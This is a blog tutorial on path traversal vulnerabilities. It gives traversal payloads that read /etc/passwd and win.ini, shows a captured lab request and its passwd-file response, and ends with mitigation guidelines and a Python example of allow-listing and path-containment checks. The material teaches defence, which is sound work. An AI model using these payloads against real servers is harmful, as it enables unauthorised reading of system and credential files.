Path traversal


Codersqs

🌐 Qasim Shah — Ethical Hacker

Meet Qasim Shah, a digital maestro navigating the intricate realms of cybersecurity with finesse and purpose. As an Ethical Hacker, Qasim is on a relentless quest to fortify the digital world against cyber threats, earning him the moniker of a modern-day guardian of the virtual realm.

💡 Today’s Insight: Path Traversal

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might include:

Application code and data.
Credentials for back-end systems.
Sensitive operating system files.

Required

To test for path traversal, you need a target with a responsible disclosure or bug bounty programme whose policy permits testing of its website, so that your testing is authorised and no legal action is taken against you. You will also need an intercepting proxy such as Burp Suite.

Imagine a victim application that displays images of items for sale. It might load an image using the following HTML:

<img src="/loadImage?filename=218.png">

The loadImage URL takes a filename parameter and returns the contents of the specified file. The image files are stored on disk in the location /var/www/images/. To return an image, the application appends the requested filename to this base directory and uses a filesystem API to read the contents of the file. In other words, the application reads from the following file path:

/var/www/images/218.png

Capture the request in your proxy and change the filename parameter as follows:

https://insecure-website.com/loadImage?filename=../../../etc/passwd

Example

GET /image?filename=../../../etc/passwd HTTP/2
Host: 0a09009c039d886480c0c64000320033.web-security-academy.net
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36

HTTP/2 200 OK
Content-Type: image/jpeg
Set-Cookie: session=Z9xgKRho6OvBxJdKCBkpniuMrBwCgO1c; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 2316

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

On Windows, both ../ and ..\ are valid directory traversal sequences. The following is an example of an equivalent attack against a Windows-based server:

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

Path traversal is a security issue that occurs when an application lets an attacker navigate outside the intended directory and access files and directories that should be restricted.

To mitigate path traversal vulnerabilities, consider the following general guidelines:

Input Validation:

Always validate and sanitize user input thoroughly.
Implement strict input validation to ensure that user-supplied data doesn’t contain any unauthorized characters or sequences.

File Path Security:

Avoid directly using user input to construct file paths.
Use platform-specific APIs and libraries for file manipulation to ensure secure file access.

Directory Whitelisting:

Maintain a whitelist of allowed directories and files.
Restrict file access to only those paths specified in the whitelist.

Access Controls:

Implement proper access controls and permissions.
Ensure that users or processes have the minimum necessary permissions to perform their tasks and access specific files or directories.

Use Canonicalization:

Employ file path canonicalization to convert paths to their standardized form.
This helps in preventing variations in path representations that attackers might exploit.
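The loadImage example above and the mitigations just listed, side by side, as an added Python example that is not code from the original post: build_path_vulnerable reproduces the unchecked "append the filename to the base directory" pattern, while is_allowed_name and resolve_inside implement the input allow-list and the canonicalize-then-check-containment mitigation. The /var/www/images base directory comes from the article; the function names, the allow-list pattern and the sample filename values are constructed for illustration.

```python
import os
import re

# Base directory from the article's example (constructed constant for this demo).
IMAGE_DIR = "/var/www/images"

# Allow-list for the bare filename: letters, digits, '_' or '-', then an image
# extension. Neither '/', '\' nor '..' can match, so traversal sequences fail here.
ALLOWED_NAME = re.compile(r"[A-Za-z0-9_-]+\.(?:png|jpe?g|gif)")


def is_allowed_name(filename: str) -> bool:
    """Input validation: accept only a plain image filename."""
    return ALLOWED_NAME.fullmatch(filename) is not None


def build_path_vulnerable(base_dir: str, filename: str) -> str:
    """The pattern the article describes: user input is appended to the base
    directory and handed to the filesystem API unchecked. normpath only shows
    which file the OS would actually open; it is not a defence."""
    return os.path.normpath(os.path.join(base_dir, filename))


def resolve_inside(base_dir: str, filename: str) -> str:
    """Canonicalization check: resolve the requested path (following symlinks)
    and confirm it is still under base_dir. Raises ValueError otherwise."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # commonpath rather than startswith: a plain prefix test would accept
    # /var/www/images2/... as lying inside /var/www/images.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"rejected: {filename!r} resolves outside {base}")
    return candidate


def build_path_safe(base_dir: str, filename: str) -> str:
    """Hardened version combining the article's mitigations: allow-list the
    name first, then canonicalize and confirm containment as defence in depth."""
    if not is_allowed_name(filename):
        raise ValueError(f"rejected: {filename!r} is not an allowed image name")
    return resolve_inside(base_dir, filename)


def classify_requests(filenames):
    """Run each filename parameter through both builders. Returns a list of
    (filename, path the vulnerable code would open, accepted by safe code)."""
    results = []
    for name in filenames:
        try:
            build_path_safe(IMAGE_DIR, name)
            accepted = True
        except ValueError:
            accepted = False
        results.append((name, build_path_vulnerable(IMAGE_DIR, name), accepted))
    return results


if __name__ == "__main__":
    # Constructed sample values of the filename parameter, including the Unix
    # and Windows traversal sequences shown in the article.
    samples = ["218.png", "../../../etc/passwd", r"..\..\..\windows\win.ini"]
    for name, opened, accepted in classify_requests(samples):
        verdict = "accepted" if accepted else "REJECTED"
        print(f"{name!r:35} vulnerable code opens {opened:30} safe code: {verdict}")
```

Note that the containment check alone is what stops the ../ sequence; the allow-list is the cheaper first filter and is what rejects the Windows-style backslash variant on a system where the backslash is not a path separator. Any URL decoding done by the web framework must happen before these checks, so the functions receive the decoded parameter value.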

Farewell, dear readers! I hope you’ve enjoyed exploring my blog. If there are any mistakes on my part, I sincerely apologize. Feel free to reach out with any questions or feedback, and I’ll be sure to respond. Happy hunting for knowledge and adventures!
